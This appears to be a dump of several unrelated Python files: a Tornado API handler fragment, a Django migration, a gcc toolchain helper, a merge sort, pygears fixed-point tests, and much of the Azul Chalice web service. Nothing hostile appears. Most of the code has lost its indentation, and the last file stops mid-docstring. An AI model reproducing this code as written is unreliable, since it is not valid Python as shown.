def gen_sd(self):
sd = libcard2.localization.skill_describer_for_locale(self.locale.code)
desc_fmt_args = {"var": "", "let": "", "end": "", "value": "X"}
word_set = {}
for skill_id, formatter in sd.skill_effect.data.items():
if callable(formatter):
wl = formatter(**desc_fmt_args)
else:
wl = formatter.format(**desc_fmt_args)
def get(self):
return
@route(r"/api/private/langmenu.json")
class APILanguageMenu(RequestHandler):
def get(self):
dicts = [{
"code": self.settings["string_access"].master.language,
"name": self.locale.translate("DefaultDictionaryName")
}]
dicts.extend([{
"code": x.code,
"name": x.name,
} for x in self.settings["string_access"].choices])
self.write({
"languages": list(get_supported_locales()),
"dictionaries": dicts
})
|
# Generated by Django 2.1.7 on 2019-05-12 19:34
from django.db import migrations, models
from django.contrib.postgres.fields import JSONField
class Migration(migrations.Migration):
dependencies = [
('device_registry', '0024_fix_scan_info_content'),
]
operations = [
migrations.AddField(
model_name='deviceinfo',
name='app_armor_enabled',
field=models.BooleanField(blank=True, null=True),
),
migrations.AddField(
model_name='deviceinfo',
name='selinux_state',
field=JSONField(default=dict),
),
]
|
# coding: utf-8
"""
Tools to interact with toolchains: GCC, Clang, and other UNIX compilers
"""
from .util import _create_shared_base, _libext
LIBEXT = _libext()
def _obj_ext():
return '.o'
def _obj_cmd(source, toolchain, options):
obj_ext = _obj_ext()
return '{} -c -O3 -o {} {} -fPIC -std=c99 {}' \
.format(toolchain, source + obj_ext, source + '.c', ' '.join(options))
def _lib_cmd(objects, target, lib_ext, toolchain, options):
return '{} -shared -O3 -o {} {} -std=c99 {}' \
.format(toolchain, target + lib_ext,
' '.join(objects), ' '.join(options))
def _create_shared(dirpath, toolchain, recipe, nthread, options, verbose): # pylint: disable=R0913
options += ['-lm']
# Specify command to compile an object file
recipe['object_ext'] = _obj_ext()
recipe['library_ext'] = LIBEXT
# pylint: disable=C0111
def obj_cmd(source):
return _obj_cmd(source, toolchain, options)
def lib_cmd(objects, target):
return _lib_cmd(objects, target, LIBEXT, toolchain, options)
recipe['create_object_cmd'] = obj_cmd
recipe['create_library_cmd'] = lib_cmd
recipe['initial_cmd'] = ''
return _create_shared_base(dirpath, recipe, nthread, verbose)
__all__ = []
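# Illustrative sketch (not part of the public API): prints the shell commands
# the private helpers above generate for a hypothetical source file.
if __name__ == '__main__':
    print(_obj_cmd('model', 'gcc', ['-fopenmp']))
    # -> gcc -c -O3 -o model.o model.c -fPIC -std=c99 -fopenmp
    print(_lib_cmd(['model.o'], 'libmodel', LIBEXT, 'gcc', ['-fopenmp']))
    # -> e.g. gcc -shared -O3 -o libmodel.so model.o -std=c99 -fopenmp (extension is platform-dependent)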
|
"""
In computer science, merge sort (also commonly spelled mergesort) is an efficient,
general-purpose, comparison-based sorting algorithm.
Most implementations produce a stable sort,
which means that the implementation preserves the input order of equal elements in the sorted output.
Mergesort is a divide and conquer algorithm that was invented by John von Neumann in 1945.
"""
def _merge(left, right):
"""
Function merges left and right parts
Args:
left: left part of array
right: right part of array
Returns:
Sorted and merged left + right parts
"""
merge_result = []
i = 0
j = 0
while i < len(left) and j < len(right):
if left[i] <= right[j]:
merge_result += [left[i]]
i += 1
else:
merge_result += [right[j]]
j += 1
merge_result += left[i:len(left)]
merge_result += right[j:len(right)]
return merge_result
def merge_sort(array):
"""
Sort array via merge sort algorithm
Args:
array: list of elements to be sorted
Returns:
Sorted list of elements
Examples:
>>> merge_sort([1, -10, 21, 3, 5])
[-10, 1, 3, 5, 21]
"""
    if len(array) <= 1:  # empty and single-element lists are already sorted
return array[:]
mid = len(array) // 2
left = merge_sort(array[:mid])
right = merge_sort(array[mid:])
sort_result = _merge(left, right)
return sort_result
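# Quick self-check sketch: runs the doctests above and sorts a small sample list.
if __name__ == "__main__":
    import doctest

    doctest.testmod()
    print(merge_sort([5, 2, 9, 1, 5, 6]))  # [1, 2, 5, 5, 6, 9]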
|
from math import ceil, floor
from pygears.typing import Fixp, Ufixp, Uint, Int
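# Reading aid, inferred from the assertions below: Ufixp[I, W] is an unsigned
# fixed-point type with W total bits, I of them integer bits, so Ufixp[2, 3]
# has quant == 0.5 and max == 3.5; Fixp[I, W] is the signed analogue, so
# Fixp[2, 3] spans min == -2.0 to max == 1.5 in steps of 0.5.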
def test_abs():
uq2_3 = Ufixp[2, 3]
q2_3 = Fixp[2, 3]
q3_4 = Fixp[3, 4]
assert abs(uq2_3.max) == uq2_3.max
assert abs(q2_3.min) == q3_4(abs(float(q2_3.min)))
def test_add():
uq2_3 = Ufixp[2, 3]
uq2_4 = Ufixp[2, 4]
uq3_4 = Ufixp[3, 4]
uq3_5 = Ufixp[3, 5]
uq4_5 = Ufixp[4, 5]
uq4_6 = Ufixp[4, 6]
q2_3 = Fixp[2, 3]
q2_4 = Fixp[2, 4]
q3_4 = Fixp[3, 4]
q3_5 = Fixp[3, 5]
q4_5 = Fixp[4, 5]
q4_6 = Fixp[4, 6]
q5_6 = Fixp[5, 6]
q5_7 = Fixp[5, 7]
assert uq2_3.quant + uq3_4.quant == uq4_5(float(uq2_3.quant) + float(uq3_4.quant))
assert uq2_3.max + uq3_4.max == uq4_5(11.0)
assert uq3_4.max + uq3_4.max == uq4_5(15.0)
assert uq2_4.quant + uq3_4.quant == uq4_6(float(uq2_4.quant) + float(uq3_4.quant))
assert uq2_4.max + uq3_4.max == uq4_6(11.25)
assert uq3_4.max + uq3_5.max == uq4_6(15.25)
assert q2_3.quant + q3_4.quant == q4_5(float(q2_3.quant) + float(q3_4.quant))
assert q2_3.max + q3_4.max == q4_5(5.0)
assert q3_4.max + q3_4.max == q4_5(7.0)
assert q2_4.quant + q3_4.quant == q4_6(float(q2_4.quant) + float(q3_4.quant))
assert q2_4.max + q3_4.max == q4_6(5.25)
assert q3_4.max + q3_5.max == q4_6(7.25)
assert uq2_3.quant + q3_4.quant == q4_5(float(uq2_3.quant) + float(q3_4.quant))
assert uq2_3.max + q3_4.max == q4_5(7.0)
assert q2_3.max + uq3_4.max == q5_6(9.0)
assert uq3_4.max + q3_4.max == q5_6(11.0)
assert uq2_4.quant + q3_4.quant == q4_6(float(uq2_4.quant) + float(q3_4.quant))
assert uq2_4.max + q3_4.max == q4_6(7.25)
assert uq3_4.max + q3_5.max == q5_7(11.25)
assert q2_4.max + uq3_4.max == q5_7(9.25)
assert q2_3.min + q3_4.max == q4_5(1.5)
assert q3_4.min + q3_4.max == q4_5(-0.5)
assert q2_4.min + q3_4.max == q4_6(1.5)
assert q3_4.min + q3_5.max == q4_6(-0.25)
assert uq2_3.max + q3_4.min == q4_5(-0.5)
assert q2_3.min + uq3_4.max == q5_6(5.5)
assert uq3_4.max + q3_4.min == q5_6(3.5)
assert uq2_4.max + q3_4.min == q4_6(-0.25)
assert uq3_4.max + q3_5.min == q5_7(3.5)
assert q2_4.min + uq3_4.max == q5_7(5.5)
def test_ceil():
uq2_4 = Ufixp[2, 4]
q2_3 = Fixp[2, 3]
uq4_4 = Ufixp[4, 4]
q6_3 = Fixp[6, 3]
assert ceil(uq2_4.max) == Ufixp[3, 5](4.0)
assert ceil(uq2_4(3.25)) == Ufixp[3, 5](4.0)
assert ceil(q2_3.min) == Fixp[3, 4](-2.0)
assert ceil(q2_3(-1.5)) == Fixp[3, 4](-1.0)
assert ceil(uq4_4.max) == uq4_4.max
assert ceil(q6_3.min) == q6_3.min
def test_floor():
uq2_4 = Ufixp[2, 4]
q2_3 = Fixp[2, 3]
uq4_4 = Ufixp[4, 4]
q6_3 = Fixp[6, 3]
assert floor(uq2_4.max) == uq2_4(3.0)
assert floor(uq2_4(3.25)) == uq2_4(3.0)
assert floor(q2_3.min) == q2_3(-2.0)
assert floor(q2_3(-1.5)) == q2_3(-2.0)
assert floor(uq4_4.max) == uq4_4.max
assert floor(q6_3.min) == q6_3.min
def test_ge():
uq2_3 = Ufixp[2, 3]
q2_3 = Fixp[2, 3]
assert uq2_3(1.5) >= q2_3(1.5)
assert q2_3(1.5) >= uq2_3(1.5)
assert uq2_3.max >= q2_3.min
assert q2_3.max >= uq2_3.min
def test_gt():
uq2_3 = Ufixp[2, 3]
q2_3 = Fixp[2, 3]
assert uq2_3(2.0) > q2_3(1.5)
assert q2_3(1.5) > uq2_3(1.0)
assert uq2_3.max > q2_3.min
assert q2_3.max > uq2_3.min
def test_le():
uq2_3 = Ufixp[2, 3]
q2_3 = Fixp[2, 3]
assert uq2_3(1.5) <= q2_3(1.5)
assert q2_3(1.5) <= uq2_3(1.5)
assert uq2_3.min <= q2_3.max
assert q2_3.min <= uq2_3.max
def test_lt():
uq2_3 = Ufixp[2, 3]
q2_3 = Fixp[2, 3]
assert uq2_3(1.0) < q2_3(1.5)
assert q2_3(1.0) < uq2_3(1.5)
assert uq2_3.min < q2_3.max
assert q2_3.min < uq2_3.max
def test_lshift():
uq2_3 = Ufixp[2, 3]
uq4_3 = Ufixp[4, 3]
q2_3 = Fixp[2, 3]
q4_3 = Fixp[4, 3]
assert uq2_3.max << 2 == uq4_3(14.0)
assert q2_3.min << 2 == q4_3.min
assert uq2_3.max << 0 == uq2_3.max
assert q2_3.min << 0 == q2_3.min
def test_neg():
uq2_3 = Ufixp[2, 3]
q2_3 = Fixp[2, 3]
q3_4 = Fixp[3, 4]
assert -uq2_3.max == q3_4(-float(uq2_3.max))
assert -q2_3.min == q3_4(-float(q2_3.min))
def test_rshift():
uq2_3 = Ufixp[2, 3]
uq4_3 = Ufixp[4, 3]
q2_3 = Fixp[2, 3]
q4_3 = Fixp[4, 3]
assert uq4_3(14.0) >> 2 == uq2_3.max
assert q4_3.min >> 2 == q2_3.min
assert uq2_3.max >> 0 == uq2_3.max
assert q2_3.min >> 0 == q2_3.min
def test_round():
uq2_4 = Ufixp[2, 4]
q2_3 = Fixp[2, 3]
uq4_4 = Ufixp[4, 4]
q6_3 = Fixp[6, 3]
assert round(uq2_4.max) == Ufixp[3, 5](4.0)
assert round(uq2_4(3.25)) == Ufixp[3, 5](3.0)
assert round(q2_3.min) == Fixp[3, 4](-2.0)
assert round(q2_3(-1.5)) == Fixp[3, 4](-1.0)
assert round(uq4_4.max) == uq4_4.max
assert round(q6_3.min) == q6_3.min
def test_sub_val():
uq2_3 = Ufixp[2, 3]
uq2_4 = Ufixp[2, 4]
uq3_4 = Ufixp[3, 4]
uq3_5 = Ufixp[3, 5]
q2_3 = Fixp[2, 3]
q2_4 = Fixp[2, 4]
q3_4 = Fixp[3, 4]
q3_5 = Fixp[3, 5]
q4_5 = Fixp[4, 5]
q4_6 = Fixp[4, 6]
q5_6 = Fixp[5, 6]
q5_7 = Fixp[5, 7]
assert uq2_3.quant - uq3_4.quant == q4_5(0.0)
assert uq2_3.min - uq3_4.max == q4_5(-7.5)
assert uq2_4.quant - uq3_4.quant == q4_6(float(uq2_4.quant) - float(uq3_4.quant))
assert uq2_4.min - uq3_4.max == q4_6(-7.5)
assert uq3_4.min - uq3_5.max == q4_6(-7.75)
assert q2_3.quant - q3_4.quant == q4_5(0.0)
assert q2_3.min - q3_4.max == q4_5(-5.5)
assert q3_4.min - q3_4.max == q4_5(-7.5)
assert q3_4.max - q3_4.min == q4_5(7.5)
assert q2_4.quant - q3_4.quant == q4_6(float(q2_4.quant) - float(q3_4.quant))
assert q2_4.min - q3_4.max == q4_6(-5.5)
assert q2_4.max - q3_4.min == q4_6(5.75)
assert q3_4.min - q3_5.max == q4_6(-7.75)
assert q3_4.max - q3_5.min == q4_6(7.5)
assert uq2_3.quant - q3_4.quant == q4_5(0.0)
assert uq2_3.max - q3_4.min == q4_5(7.5)
assert q2_3.min - uq3_4.max == q5_6(-9.5)
assert uq3_4.max - q3_4.min == q5_6(11.5)
assert q3_4.min - uq3_4.max == q5_6(-11.5)
assert uq2_4.quant - q3_4.quant == q4_6(float(uq2_4.quant) - float(q3_4.quant))
assert uq2_4.max - q3_4.min == q4_6(7.75)
assert uq3_4.max - q3_5.min == q5_7(11.5)
assert q2_4.min - uq3_4.max == q5_7(-9.5)
|
import base64
import hashlib
from inspect import (
signature,
)
import json
import logging.config
import re
from typing import (
Any,
Callable,
Mapping,
Optional,
Sequence,
Union,
)
import urllib.parse
from botocore.exceptions import (
ClientError,
)
import chalice
# noinspection PyPackageRequirements
from chalice import (
BadRequestError,
ChaliceViewError,
Response,
UnauthorizedError,
)
import chevron
from furl import (
furl,
)
from more_itertools import (
one,
)
from azul import (
CatalogName,
RequirementError,
cache,
cached_property,
config,
drs,
)
from azul.auth import (
OAuth2,
)
from azul.chalice import (
AzulChaliceApp,
)
from azul.drs import (
AccessMethod,
)
from azul.health import (
HealthController,
)
from azul.logging import (
configure_app_logging,
)
from azul.openapi import (
application_json,
format_description,
params,
responses,
schema,
)
from azul.plugins import (
MetadataPlugin,
ServiceConfig,
)
from azul.plugins.metadata.hca.transform import (
value_and_unit,
)
from azul.portal_service import (
PortalService,
)
from azul.service import (
BadArgumentException,
)
from azul.service.catalog_controller import (
CatalogController,
)
from azul.service.drs_controller import (
DRSController,
)
from azul.service.elasticsearch_service import (
Pagination,
)
from azul.service.manifest_controller import (
ManifestController,
)
from azul.service.manifest_service import (
CurlManifestGenerator,
ManifestFormat,
)
from azul.service.repository_controller import (
RepositoryController,
)
from azul.service.storage_service import (
StorageService,
)
from azul.strings import (
pluralize,
)
from azul.types import (
AnyJSON,
JSON,
LambdaContext,
MutableJSON,
PrimitiveJSON,
reify,
)
log = logging.getLogger(__name__)
spec = {
'openapi': '3.0.1',
'info': {
'title': config.service_name,
'description': format_description(f'''
# Overview
Azul is a REST web service for querying metadata associated with
both experimental and analysis data from a data repository. In order
to deliver response times that make it suitable for interactive use
cases, the set of metadata properties that it exposes for sorting,
filtering, and aggregation is limited. Azul provides a uniform view
of the metadata over a range of diverse schemas, effectively
shielding clients from changes in the schema as they occur over
time. It does so, however, at the expense of detail in the set of
metadata properties it exposes and in the accuracy with which it
aggregates them.
Azul denormalizes and aggregates metadata into several different
indices for selected entity types:
- [projects](#operations-Index-get_index_projects)
- [samples](#operations-Index-get_index_samples)
- [files](#operations-Index-get_index_files)
- [bundles](#operations-Index-get_index_bundles)
This set of indexes forms a catalog. There is a default catalog
called `{config.default_catalog}` which will be used unless a
different catalog name is specified using the `catalog` query
parameter. Metadata from different catalogs is completely
independent: a response obtained by querying one catalog does not
necessarily correlate to a response obtained by querying another
one. Two catalogs can contain metadata from the same source or
different sources. It is only guaranteed that the body of a
response by any given endpoint adheres to one schema,
independently of what catalog was specified in the request.
Azul provides the ability to download data and metadata via the
[Manifests](#operations-tag-Manifests) endpoints. The
`{ManifestFormat.curl.value}` format manifests can be used to
download data files. Other formats provide various views of the
metadata. Manifests can be generated for a selection of files using
filters. These filters are interchangeable with the filters used by
the [Index](#operations-tag-Index) endpoints.
Azul also provides a
[summary](#operations-Index-get_index_summary) view of
indexed data.
## Data model
Any index, when queried, returns a JSON array of hits. Each hit
represents a metadata entity. Nested in each hit is a summary of the
properties of entities associated with the hit. An entity is
associated either by a direct edge in the original metadata graph,
or indirectly as a series of edges. The nested properties are
grouped by the type of the associated entity. The properties of all
data files associated with a particular sample, for example, are
listed under `hits[*].files` in a `/index/samples` response. It
is important to note that while each _hit_ represents a discrete
entity, the properties nested within that hit are the result of an
aggregation over potentially many associated entities.
To illustrate this, consider a data file that is part of two
projects (a project is a group of related experiments, typically by
one laboratory, institution or consortium). Querying the `files`
index for this file yields a hit looking something like:
```
{{
"projects": [
{{
"projectTitle": "Project One"
"laboratory": ...,
...
}},
{{
"projectTitle": "Project Two"
"laboratory": ...,
...
}}
],
"files": [
{{
"format": "pdf",
"name": "Team description.pdf",
...
}}
]
}}
```
This example hit contains two kinds of nested entities (a hit in
an actual Azul response will contain more): There are the two
projects entities, and the file itself. These nested entities
contain selected metadata properties extracted in a consistent way.
This makes filtering and sorting simple.
Also notice that there is only one file. When querying a particular
index, the corresponding entity will always be a singleton like
this.
'''),
        # Version should be updated in any PR tagged `API`: a major version
        # bump for breaking changes, and a minor version bump otherwise
'version': '1.0'
},
'tags': [
{
'name': 'Index',
'description': 'Query the indices for entities of interest'
},
{
'name': 'Manifests',
'description': 'Complete listing of files matching a given filter in TSV and other formats'
},
{
'name': 'Repository',
'description': 'Access to data files in the underlying repository'
},
{
'name': 'DSS',
'description': 'Access to files maintained in the Data Store'
},
{
'name': 'DRS',
'description': 'DRS-compliant proxy of the underlying repository'
},
{
'name': 'Auxiliary',
'description': 'Describes various aspects of the Azul service'
}
]
}
class ServiceApp(AzulChaliceApp):
def spec(self) -> JSON:
return {
**super().spec(),
**self._oauth2_spec()
}
def _oauth2_spec(self) -> JSON:
scopes = ('email',)
return {
'components': {
'securitySchemes': {
self.app_name: {
'type': 'oauth2',
'flows': {
'implicit': {
'authorizationUrl': 'https://accounts.google.com/o/oauth2/auth',
'scopes': {scope: scope for scope in scopes},
}
}
}
}
},
'security': [
{},
{self.app_name: scopes}
],
}
@property
def drs_controller(self) -> DRSController:
return self._create_controller(DRSController)
@property
def health_controller(self) -> HealthController:
# Don't cache. Health controller is meant to be short-lived since it
        # applies its own caching. If we cached the controller, we'd never
# observe any changes in health.
return HealthController(lambda_name='service')
@cached_property
def catalog_controller(self) -> CatalogController:
return self._create_controller(CatalogController)
@property
def repository_controller(self) -> RepositoryController:
return self._create_controller(RepositoryController)
@cached_property
def manifest_controller(self) -> ManifestController:
return self._create_controller(ManifestController,
step_function_lambda_name=generate_manifest.name,
manifest_url_func=self.manifest_url)
def _create_controller(self, controller_cls, **kwargs):
return controller_cls(lambda_context=self.lambda_context,
file_url_func=self.file_url,
**kwargs)
@property
def catalog(self) -> str:
request = self.current_request
        # request is None during `chalice package`
if request is not None:
# params is None whenever no params are passed
params = request.query_params
if params is not None:
try:
return params['catalog']
except KeyError:
pass
return config.default_catalog
@property
def metadata_plugin(self) -> MetadataPlugin:
return self._metadata_plugin(self.catalog)
@cache
def _metadata_plugin(self, catalog: CatalogName):
return MetadataPlugin.load(catalog).create()
@property
def service_config(self) -> ServiceConfig:
return self.metadata_plugin.service_config()
@property
def facets(self) -> Sequence[str]:
return sorted(self.service_config.translation.keys())
def __init__(self):
super().__init__(app_name=config.service_name,
app_module_path=__file__,
# see LocalAppTestCase.setUpClass()
unit_test=globals().get('unit_test', False),
spec=spec)
def get_pagination(self, entity_type: str) -> Pagination:
query_params = self.current_request.query_params or {}
default_sort, default_order = sort_defaults[entity_type]
pagination = Pagination(order=query_params.get('order', default_order),
size=int(query_params.get('size', '10')),
sort=query_params.get('sort', default_sort),
self_url=app.self_url()) # For `_generate_paging_dict()`
sa = query_params.get('search_after')
sb = query_params.get('search_before')
sa_uid = query_params.get('search_after_uid')
sb_uid = query_params.get('search_before_uid')
if not sb and sa:
pagination.search_after = [json.loads(sa), sa_uid]
elif not sa and sb:
pagination.search_before = [json.loads(sb), sb_uid]
elif sa and sb:
raise BadArgumentException("Bad arguments, only one of search_after or search_before can be set")
return pagination
# FIXME: Return furl instance
# https://github.com/DataBiosphere/azul/issues/3398
def file_url(self,
catalog: CatalogName,
file_uuid: str,
fetch: bool = True,
**params: str) -> str:
file_uuid = urllib.parse.quote(file_uuid, safe='')
view_function = fetch_repository_files if fetch else repository_files
path = one(view_function.path)
return str(furl(url=self.self_url(path.format(file_uuid=file_uuid)),
args=dict(catalog=catalog,
**params)))
def _authenticate(self) -> Optional[OAuth2]:
try:
header = self.current_request.headers['Authorization']
except KeyError:
return None
else:
try:
auth_type, auth_token = header.split()
except ValueError:
raise UnauthorizedError(header)
else:
if auth_type.lower() == 'bearer':
return OAuth2(auth_token)
else:
raise UnauthorizedError(header)
# FIXME: Return furl instance
# https://github.com/DataBiosphere/azul/issues/3398
def manifest_url(self,
fetch: bool,
catalog: CatalogName,
format_: ManifestFormat,
**params: str) -> str:
view_function = fetch_file_manifest if fetch else file_manifest
return str(furl(url=self.self_url(one(view_function.path)),
args=dict(catalog=catalog,
format=format_.value,
**params)))
app = ServiceApp()
configure_app_logging(app, log)
sort_defaults = {
'files': ('fileName', 'asc'),
'samples': ('sampleId', 'asc'),
'projects': ('projectTitle', 'asc'),
'bundles': ('bundleVersion', 'desc')
}
@app.route('/', cors=True)
def swagger_ui():
swagger_ui_template = app.load_static_resource('swagger-ui.html.template.mustache')
swagger_ui_html = chevron.render(swagger_ui_template, {
'OAUTH2_CLIENT_ID': json.dumps(config.google_oauth2_client_id),
'OAUTH2_REDIRECT_URL': json.dumps(app.self_url('/oauth2_redirect'))
})
return Response(status_code=200,
headers={"Content-Type": "text/html"},
body=swagger_ui_html)
@app.route('/oauth2_redirect', enabled=config.google_oauth2_client_id is not None)
def oauth2_redirect():
oauth2_redirect_html = app.load_static_resource('oauth2-redirect.html')
return Response(status_code=200,
headers={"Content-Type": "text/html"},
body=oauth2_redirect_html)
@app.route('/openapi', methods=['GET'], cors=True, method_spec={
'summary': 'Return OpenAPI specifications for this service',
'description': 'This endpoint returns the [OpenAPI specifications]'
'(https://github.com/OAI/OpenAPI-Specification) for this '
'service. These are the specifications used to generate the '
'page you are visiting now.',
'responses': {
'200': {
'description': '200 response',
**responses.json_content(
schema.object(
openapi=str,
**{
k: schema.object()
for k in ('info', 'tags', 'servers', 'paths', 'components')
}
)
)
}
},
'tags': ['Auxiliary']
})
def openapi():
return Response(status_code=200,
headers={'content-type': 'application/json'},
body=app.spec())
health_up_key = {
'up': format_description('''
indicates the overall result of the health check
'''),
}
fast_health_keys = {
**{
prop.key: format_description(prop.description)
for prop in HealthController.fast_properties['service']
},
**health_up_key
}
health_all_keys = {
**{
prop.key: format_description(prop.description)
for prop in HealthController.all_properties
},
**health_up_key
}
def health_spec(health_keys: dict):
return {
'responses': {
f'{200 if up else 503}': {
'description': format_description(f'''
{'The' if up else 'At least one of the'} checked resources
{'are' if up else 'is not'} healthy.
The response consists of the following keys:
''') + ''.join(f'* `{k}` {v}' for k, v in health_keys.items()) + format_description(f'''
The top-level `up` key of the response is
`{'true' if up else 'false'}`.
''') + (format_description(f'''
{'All' if up else 'At least one'} of the nested `up` keys
{'are `true`' if up else 'is `false`'}.
''') if len(health_keys) > 1 else ''),
**responses.json_content(
schema.object(
additional_properties=schema.object(
additional_properties=True,
up=schema.enum(up)
),
up=schema.enum(up)
),
example={
k: up if k == 'up' else {} for k in health_keys
}
)
} for up in [True, False]
},
'tags': ['Auxiliary']
}
@app.route('/health', methods=['GET'], cors=True, method_spec={
'summary': 'Complete health check',
'description': format_description('''
Health check of the service and all resources it depends on. This may
        take a long time to complete and exerts considerable load on the service.
For that reason it should not be requested frequently or by automated
monitoring facilities that would be better served by the
[`/health/fast`](#operations-Auxiliary-get_health_fast) or
[`/health/cached`](#operations-Auxiliary-get_health_cached) endpoints.
'''),
**health_spec(health_all_keys)
})
def health():
return app.health_controller.health()
@app.route('/health/basic', methods=['GET'], cors=True, method_spec={
'summary': 'Basic health check',
'description': format_description('''
Health check of only the REST API itself, excluding other resources
the service depends on. A 200 response indicates that the service is
reachable via HTTP(S) but nothing more.
'''),
**health_spec(health_up_key)
})
def basic_health():
return app.health_controller.basic_health()
@app.route('/health/cached', methods=['GET'], cors=True, method_spec={
'summary': 'Cached health check for continuous monitoring',
'description': format_description('''
Return a cached copy of the
[`/health/fast`](#operations-Auxiliary-get_health_fast) response.
This endpoint is optimized for continuously running, distributed health
monitors such as Route 53 health checks. The cache ensures that the
service is not overloaded by these types of health monitors. The cache
is updated every minute.
'''),
**health_spec(fast_health_keys)
})
def cached_health():
return app.health_controller.cached_health()
@app.route('/health/fast', methods=['GET'], cors=True, method_spec={
'summary': 'Fast health check',
'description': format_description('''
Performance-optimized health check of the REST API and other critical
resources the service depends on. This endpoint can be requested more
frequently than [`/health`](#operations-Auxiliary-get_health) but
periodically scheduled, automated requests should be made to
[`/health/cached`](#operations-Auxiliary-get_health_cached).
'''),
**health_spec(fast_health_keys)
})
def fast_health():
return app.health_controller.fast_health()
@app.route('/health/{keys}', methods=['GET'], cors=True, method_spec={
'summary': 'Selective health check',
'description': format_description('''
This endpoint allows clients to request a health check on a specific set
of resources. Each resource is identified by a *key*, the same key
under which the resource appears in a
[`/health`](#operations-Auxiliary-get_health) response.
'''),
**health_spec(health_all_keys)
}, path_spec={
'parameters': [
params.path(
'keys',
type_=schema.array(schema.enum(*sorted(HealthController.all_keys()))),
description='''
A comma-separated list of keys selecting the health checks to be
performed. Each key corresponds to an entry in the response.
''')
],
})
def custom_health(keys: Optional[str] = None):
return app.health_controller.custom_health(keys)
@app.schedule('rate(1 minute)', name='servicecachehealth')
def update_health_cache(_event: chalice.app.CloudWatchEvent):
app.health_controller.update_cache()
@app.route('/version', methods=['GET'], cors=True, method_spec={
'summary': 'Describe current version of the Azul service',
'tags': ['Auxiliary'],
'responses': {
'200': {
'description': 'Version endpoint is reachable.',
**responses.json_content(
schema.object(
git=schema.object(
commit=str,
dirty=bool
),
changes=schema.array(
schema.object(
title=str,
issues=schema.array(str),
upgrade=schema.array(str),
notes=schema.optional(str)
)
)
)
)
}
}
})
def version():
from azul.changelog import (
compact_changes,
)
return {
'git': config.lambda_git_status,
'changes': compact_changes(limit=10)
}
def validate_repository_search(params, **validators):
validate_params(params, **{
'catalog': validate_catalog,
'filters': validate_filters,
'order': str,
'search_after': str,
'search_after_uid': str,
'search_before': str,
'search_before_uid': str,
'size': validate_size,
'sort': validate_facet,
**validators
})
min_page_size = 1
max_page_size = 1000
def validate_catalog(catalog):
try:
config.Catalog.validate_name(catalog)
except RequirementError as e:
raise BadRequestError(e)
else:
if catalog not in config.catalogs:
raise BadRequestError(f'Catalog name {catalog!r} is invalid. '
f'Must be one of {set(config.catalogs)}.')
def validate_size(size):
"""
>>> validate_size('1000')
>>> validate_size('1001')
Traceback (most recent call last):
...
chalice.app.BadRequestError: BadRequestError: Invalid value for parameter `size`, must not be greater than 1000
>>> validate_size('0')
Traceback (most recent call last):
...
chalice.app.BadRequestError: BadRequestError: Invalid value for parameter `size`, must be greater than 0
>>> validate_size('foo')
Traceback (most recent call last):
...
chalice.app.BadRequestError: BadRequestError: Invalid value for parameter `size`
"""
try:
size = int(size)
except BaseException:
raise BadRequestError('Invalid value for parameter `size`')
else:
if size > max_page_size:
raise BadRequestError(f'Invalid value for parameter `size`, must not be greater than {max_page_size}')
elif size < min_page_size:
raise BadRequestError('Invalid value for parameter `size`, must be greater than 0')
def validate_filters(filters):
"""
>>> validate_filters('{"fileName": {"is": ["foo.txt"]}}')
>>> validate_filters('"')
Traceback (most recent call last):
...
chalice.app.BadRequestError: BadRequestError: The `filters` parameter is not valid JSON
>>> validate_filters('""')
Traceback (most recent call last):
...
chalice.app.BadRequestError: BadRequestError: The `filters` parameter must be a dictionary.
>>> validate_filters('{"sampleDisease": ["H syndrome"]}') # doctest: +NORMALIZE_WHITESPACE
Traceback (most recent call last):
...
chalice.app.BadRequestError: BadRequestError: \
The `filters` parameter entry for `sampleDisease` must be a single-item dictionary.
>>> validate_filters('{"sampleDisease": {"is": "H syndrome"}}') # doctest: +NORMALIZE_WHITESPACE
Traceback (most recent call last):
...
chalice.app.BadRequestError: BadRequestError: The value of the `is` relation in the `filters` parameter entry for \
`sampleDisease` is not a list.
>>> validate_filters('{"sampleDisease": {"was": "H syndrome"}}') # doctest: +NORMALIZE_WHITESPACE
Traceback (most recent call last):
...
chalice.app.BadRequestError: BadRequestError: The relation in the `filters` parameter entry for `sampleDisease` \
must be one of ('is', 'contains', 'within', 'intersects')
>>> validate_filters('{"fileSource": {"is": [["foo:23/33"]]}}')
Traceback (most recent call last):
...
chalice.app.BadRequestError: BadRequestError: The value of the `is` relation in the `filters` parameter is invalid.
"""
try:
filters = json.loads(filters)
except Exception:
raise BadRequestError('The `filters` parameter is not valid JSON')
if type(filters) is not dict:
raise BadRequestError('The `filters` parameter must be a dictionary.')
for facet, filter_ in filters.items():
validate_facet(facet)
try:
relation, values = one(filter_.items())
except Exception:
raise BadRequestError(f'The `filters` parameter entry for `{facet}` must be a single-item dictionary.')
else:
valid_relations = ('is', 'contains', 'within', 'intersects')
if relation in valid_relations:
if not isinstance(values, list):
raise BadRequestError(
msg=f'The value of the `{relation}` relation in the `filters` parameter '
f'entry for `{facet}` is not a list.')
else:
raise BadRequestError(f'The relation in the `filters` parameter entry for `{facet}`'
f' must be one of {valid_relations}')
if relation == 'is':
value_types = reify(Union[JSON, PrimitiveJSON])
if not all(isinstance(value, value_types) for value in values):
raise BadRequestError('The value of the `is` relation in the `filters` '
'parameter is invalid.')
if facet == 'organismAge':
validate_organism_age_filter(values)
def validate_organism_age_filter(values):
for value in values:
try:
value_and_unit.to_index(value)
except RequirementError as e:
raise BadRequestError(e)
def validate_facet(facet_name: str):
"""
>>> validate_facet('fileName')
>>> validate_facet('fooBar')
Traceback (most recent call last):
...
chalice.app.BadRequestError: BadRequestError: Unknown facet `fooBar`
"""
if facet_name not in app.service_config.translation:
raise BadRequestError(msg=f'Unknown facet `{facet_name}`')
class Mandatory:
"""
Validation wrapper signifying that a parameter is mandatory.
"""
def __init__(self, validator: Callable) -> None:
super().__init__()
self._validator = validator
def __call__(self, param):
return self._validator(param)
def validate_params(query_params: Mapping[str, str],
allow_extra_params: bool = False,
**validators: Callable[[Any], Any]) -> None:
"""
    Validates request query parameters for the web-service API.
:param query_params: the parameters to be validated
:param allow_extra_params:
When False, only parameters specified via '**validators' are
accepted, and validation fails if additional parameters are present.
When True, additional parameters are allowed but their value is not
validated.
:param validators:
A dictionary mapping the name of a parameter to a function that will
be used to validate the parameter if it is provided. The callable
will be called with a single argument, the parameter value to be
validated, and is expected to raise ValueError, TypeError or
azul.RequirementError if the value is invalid. Only these exceptions
will yield a 4xx status response, all other exceptions will yield a
500 status response. If the validator is an instance of `Mandatory`,
then validation will fail if its corresponding parameter is not
provided.
>>> validate_params({'order': 'asc'}, order=str)
